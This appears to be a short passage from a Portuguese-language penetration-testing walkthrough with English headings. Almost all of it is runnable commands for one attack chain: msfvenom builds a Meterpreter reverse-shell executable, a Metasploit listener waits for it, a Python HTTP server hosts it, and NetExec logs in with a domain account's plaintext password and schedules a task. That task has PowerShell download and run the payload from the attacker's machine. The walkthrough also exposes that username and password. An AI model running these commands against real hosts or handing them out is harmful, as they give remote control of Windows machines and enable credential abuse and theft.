Reverse Shell Payload Setup
Esse comando deve criar um
payload.exe
executável do Windows no seu diretório de trabalho atual, e podemos usá-lo como parte da nossa cadeia de ataque para obter um retorno de chamada do Meterpreter da conta de domínio
YOUR_KALI_IP_ADDRESS=$(ip addr show eth0 | grep "inet\b" | awk '{print $2}' | cut -d/ -f1)
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=${YOUR_KALI_IP_ADDRESS} LPORT=4444 -f exe -o payload.exe
Metasploit Listener Setup
Faremos isso simplesmente com o Metasploit:
msfconsole
Quando o Metasploit estiver pronto para instruções no
msf6 >
prompt, podemos selecionar o módulo para ouvir e corresponder a todos os parâmetros anteriores que usamos anteriormente commsfvenom
.
use multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST 0.0.0.0
set ExitOnSession false
set LPORT 4444
Hosting Our Payload
python3 -m http.server
Getting our Callback
YOUR_KALI_IP_ADDRESS=$(ip addr show eth0 | grep "inet\b" | awk '{print $2}' | cut -d/ -f1)
nxc smb 10.0.29.208 -u "benjaminm" -p "w5gzI6&xx%aBqZC^GZ" -M schtask_as -o USER=${LOGGEDIN_USER} CMD="powershell \"iwr -Uri http://${YOUR_KALI_IP_ADDRESS}:8000/payload.exe -OutFile C:/Windows/Tasks/payload.exe; C:/Windows/Tasks/payload.exe\""
Last updated